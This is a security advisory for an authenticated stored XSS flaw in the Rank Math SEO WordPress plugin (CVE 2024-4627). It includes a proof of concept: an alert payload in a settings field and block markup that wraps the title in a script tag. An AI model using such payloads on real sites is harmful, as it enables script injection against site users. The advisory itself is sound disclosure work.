Rank Math SEO < 1.0.219 – Authenticated Stored XSS | CVE 2024-4627

Description

The plugin does not sanitise and escape some of its settings, which could allow users with access to the General Settings (by default admin, however such access can be given to lower roles via the Role Manager feature of the plugin) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

Proof of Concept

As a user with the Access to the General Settings of the plugin (by default admin, but such access can be given to lower role via the Role Manager of the plugin, ie /wp-admin/admin.php?page=rank-math-role-manager), add the following payload in the General Settings > Block > "Table of Contents Title" field: alert(/XSS/);

Then create a new post and add the following code while in Code Editor mode

<!-- wp:rank-math/toc-block {"headings":[{"key":"d82b7f42-eae2-497a-b892-1539398e7df6","content":"test","level":2,"link":"#test","disable":false,"isUpdated":false,"isGeneratedLink":true},{"key":"7c27c90c-49c6-429f-ae15-7a8421193dd4","content":"test","level":2,"link":"#test","disable":false,"isUpdated":false,"isGeneratedLink":true}],"listStyle":"div","titleWrapper":"script"} -->\n<div class="wp-block-rank-math-toc-block" id="rank-math-toc"><nav><div><div class=""><a href="#test">test</a></div><div class=""><a href="#test">test</a></div></div></nav></div>\n<!-- /wp:rank-math/toc-block -->